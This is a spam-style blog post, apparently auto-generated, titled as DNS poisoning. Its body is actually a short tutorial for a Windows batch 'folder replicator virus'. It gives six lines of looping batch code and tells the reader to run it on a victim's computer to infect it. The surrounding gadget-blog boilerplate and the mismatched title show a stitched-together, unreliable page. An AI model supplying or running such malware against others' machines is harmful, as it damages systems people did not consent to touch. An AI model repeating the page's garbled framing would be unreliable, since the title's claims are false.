All New DNS POISONING USING BATCH FILE PART-2 - do you know that every day there are new gadgets that are created with new advantages to simplify your life, on the blog
Gadget Center we will discuss about the latest gadgets and gadgets that have long ranging from speck and price, now we will discuss about All New DNS POISONING USING BATCH FILE PART-2 we have collected a lot of news to make this article to be really useful for you, please see.
Articles :
All New DNS POISONING USING BATCH FILE PART-2
full Link :
All New DNS POISONING USING BATCH FILE PART-2
Article Batch File Viruses,
You can also see our article on:
All New DNS POISONING USING BATCH FILE PART-2
 |
DNS POISONING USING BATCH FILE PART-2 |
Batch program offers its programmers to create their custom viruses just by misusing the way the command works, which leads to the creation of batch viruses. In this chapter we are going to learn about the dark-side of the batch by learning how to misuse commands to create batch viruses.
Folder Replicator Virus:
Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.
1. Just open up a notepad, copy and paste the below code
cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop
2. Save it as a batch file with the extension .bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.
3. Then run it on the Victims computer to infect it.
4. Any how it doesn’t cause much harm, but replicates folder inside a folder and goes on.
Once more thing that you have to notice is that, this will create directory inside another directory with the same name, so it doesn’t looks like crap, since everything reside inside one main directory, more over deleting the root directory will purge all the clumsy thing done by this piece of code.
article titled All New DNS POISONING USING BATCH FILE PART-2 has been completed in the discussion
hopefully information about All New DNS POISONING USING BATCH FILE PART-2 can provide benefits for you in determining the gadget to suit your needs so much easier in living everyday life.
you just read the article entitled All New DNS POISONING USING BATCH FILE PART-2 if you feel this information is useful for you and want to bookmark it or want to share it please use link https://mjoaobrum.blogspot.com/2016/06/all-new-dns-poisoning-using-batch-file_18.html.
Tag :
Batch File Viruses,
0 comments:
Post a Comment